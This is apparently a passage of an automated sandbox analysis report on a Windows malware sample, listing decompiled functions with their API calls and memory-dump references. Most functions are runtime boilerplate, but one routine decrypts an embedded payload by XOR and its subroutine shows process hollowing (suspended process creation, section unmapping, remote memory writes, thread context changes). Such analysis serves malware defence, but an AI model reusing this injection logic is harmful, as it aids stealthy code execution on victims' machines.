    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E030083B7(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t27;
    				intOrPtr _t33;
    				int _t37;
    				void* _t40;
    				short* _t41;
    				short* _t47;
    				intOrPtr _t48;
    				intOrPtr _t54;
    				int _t56;
    				intOrPtr _t57;
    				intOrPtr _t60;
    				signed int _t61;
    				short* _t62;
    
    				_t54 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_t27 =  *0x300bbe4; // 0xbb40e64e
    				_v8 = _t27 ^ _t61;
    				_t47 = 0;
    				_v12 = 0;
    				if(_a24 == 0) {
    					_a24 =  *((intOrPtr*)( *_a4 + 4));
    				}
    				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
    				if(_t56 != _t47) {
    					if(__eflags > 0) {
    						__eflags = _t56 - 0x7ffffff0;
    						if(_t56 <= 0x7ffffff0) {
    							_t16 = _t56 + 8; // 0x8
    							_t40 = _t56 + _t16;
    							__eflags = _t40 - 0x400;
    							if(_t40 > 0x400) {
    								_t41 = E030089C5(_t54, _t56, MultiByteToWideChar, _t40);
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xdddd;
    									goto L11;
    								}
    							} else {
    								E03009200(_t40);
    								_t41 = _t62;
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xcccc;
    									L11:
    									_t41 =  &(_t41[4]);
    									__eflags = _t41;
    								}
    							}
    							_t47 = _t41;
    						}
    					}
    					__eflags = _t47;
    					if(_t47 == 0) {
    						goto L3;
    					} else {
    						E03006C50(_t47, 0, _t56 + _t56);
    						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
    						__eflags = _t37;
    						if(_t37 != 0) {
    							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
    						}
    						E0300816A(_t47);
    						_t33 = _v12;
    					}
    				} else {
    					L3:
    					_t33 = 0;
    				}
    				_pop(_t57);
    				_pop(_t60);
    				_pop(_t48);
    				return E03006BA0(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,030084CC,?,00000000,?), ref: 03008401
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0300846B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03008479
    • __freea.LIBCMT ref: 03008483
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 58%
    			E03004BD6() {
    				signed int _t3;
    				long _t4;
    				struct _CRITICAL_SECTION* _t5;
    				struct _CRITICAL_SECTION* _t14;
    				signed int* _t17;
    				struct _CRITICAL_SECTION** _t18;
    
    				_t3 =  *0x300b1c0; // 0xffffffff
    				if(_t3 != 0xffffffff) {
    					__imp__DecodePointer( *0x300c648, _t3);
    					 *_t3();
    					 *0x300b1c0 =  *0x300b1c0 | 0xffffffff;
    				}
    				_t4 =  *0x300b1c4; // 0xffffffff
    				if(_t4 != 0xffffffff) {
    					TlsFree(_t4);
    					 *0x300b1c4 =  *0x300b1c4 | 0xffffffff;
    				}
    				_t17 = 0x300bbf0;
    				do {
    					_t14 =  *_t17;
    					if(_t14 != 0 && _t17[1] != 1) {
    						DeleteCriticalSection(_t14);
    						E03006891(_t14);
    						 *_t17 =  *_t17 & 0x00000000;
    					}
    					_t17 =  &(_t17[2]);
    				} while (_t17 < 0x300bd10);
    				_t18 = 0x300bbf0;
    				do {
    					_t5 =  *_t18;
    					if(_t5 != 0 && _t18[1] == 1) {
    						DeleteCriticalSection(_t5);
    					}
    					_t18 =  &(_t18[2]);
    				} while (_t18 < 0x300bd10);
    				return _t5;
    			}

    APIs
    • DecodePointer.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004BE7
    • TlsFree.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004C01
    • DeleteCriticalSection.KERNEL32(00000000,00000000,00009E40,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • DeleteCriticalSection.KERNEL32(FFFFFFFF,00009E40,?,03004FFF,?,03002D9E), ref: 03006DA5
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E03006097(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t15;
    				LONG* _t21;
    				void* _t31;
    				LONG* _t33;
    				void* _t34;
    				void* _t35;
    
    				_t35 = __eflags;
    				_t29 = __edx;
    				_t25 = __ebx;
    				_push(0xc);
    				_push(0x30098d8);
    				E03005030(__ebx, __edi, __esi);
    				_t31 = E03004D40(__ebx, __edx, _t35);
    				_t15 =  *0x300b970; // 0xfffffffe
    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
    					E03006E8E(_t25, _t31, 0xd);
    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
    					_t33 =  *(_t31 + 0x68);
    					 *(_t34 - 0x1c) = _t33;
    					__eflags = _t33 -  *0x300b878; // 0x300b450
    					if(__eflags != 0) {
    						__eflags = _t33;
    						if(__eflags != 0) {
    							__eflags = InterlockedDecrement(_t33);
    							if(__eflags == 0) {
    								__eflags = _t33 - 0x300b450;
    								if(__eflags != 0) {
    									E03006891(_t33);
    								}
    							}
    						}
    						_t21 =  *0x300b878; // 0x300b450
    						 *(_t31 + 0x68) = _t21;
    						_t33 =  *0x300b878; // 0x300b450
    						 *(_t34 - 0x1c) = _t33;
    						InterlockedIncrement(_t33);
    					}
    					 *(_t34 - 4) = 0xfffffffe;
    					E03006132();
    				} else {
    					_t33 =  *(_t31 + 0x68);
    				}
    				_t38 = _t33;
    				if(_t33 == 0) {
    					_push(0x20);
    					E0300420B(_t29, _t38);
    				}
    				return E03005075(_t33);
    			}

    APIs
    • __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • InterlockedIncrement.KERNEL32(0300B450), ref: 0300611B
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 58%
    			E03004CC7(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				long* _t7;
    				void* _t8;
    				long _t11;
    				long _t18;
    				long* _t19;
    
    				_t3 = GetLastError();
    				_push( *0x300b1c0);
    				_t18 = _t3;
    				_t19 =  *((intOrPtr*)(E03004BA2()))();
    				if(_t19 == 0) {
    					_t7 = E03006933(1, 0x214);
    					_t19 = _t7;
    					if(_t19 != 0) {
    						__imp__DecodePointer( *0x300c644,  *0x300b1c0, _t19);
    						_t8 =  *_t7();
    						_t22 = _t8;
    						if(_t8 == 0) {
    							E03006891(_t19);
    							_t19 = 0;
    							__eflags = 0;
    						} else {
    							_push(0);
    							_push(_t19);
    							E03004C13(__ebx, _t18, _t19, _t22);
    							_t11 = GetCurrentThreadId();
    							_t19[1] = _t19[1] | 0xffffffff;
    							 *_t19 = _t11;
    						}
    					}
    				}
    				SetLastError(_t18);
    				return _t19;
    			}

    APIs
    • GetLastError.KERNEL32(?,?,03003EAA,03002BF3), ref: 03004CCB
      • Part of subcall function 03004BA2: TlsGetValue.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BAB
      • Part of subcall function 03004BA2: DecodePointer.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BBD
      • Part of subcall function 03004BA2: TlsSetValue.KERNEL32(00000000,?,03004CDE,?,03003EAA,03002BF3), ref: 03004BCC
    • SetLastError.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D35
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D07
    • GetCurrentThreadId.KERNEL32(?,03003EAA,03002BF3), ref: 03004D1D
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 91%
    			E03004C13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t26;
    				intOrPtr _t30;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t31 = __ebx;
    				_push(8);
    				_push(0x3009848);
    				E03005030(__ebx, __edi, __esi);
    				GetModuleHandleW(L"KERNEL32.DLL");
    				_t39 =  *((intOrPtr*)(_t40 + 8));
    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3001c10;
    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
    				 *((char*)(_t39 + 0xc8)) = 0x43;
    				 *((char*)(_t39 + 0x14b)) = 0x43;
    				 *(_t39 + 0x68) = 0x300b450;
    				E03006E8E(__ebx, 1, 0xd);
    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
    				InterlockedIncrement( *(_t39 + 0x68));
    				 *(_t40 - 4) = 0xfffffffe;
    				E03004CB5();
    				E03006E8E(_t31, 1, 0xc);
    				 *(_t40 - 4) = 1;
    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
    				if(_t26 == 0) {
    					_t30 =  *0x300bbb8; // 0x300bae0
    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
    				}
    				E03006558( *((intOrPtr*)(_t39 + 0x6c)));
    				 *(_t40 - 4) = 0xfffffffe;
    				return E03005075(E03004CBE());
    			}








    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300656A
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006577
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006584
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006591
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300659E
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065BA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}













    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}













    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
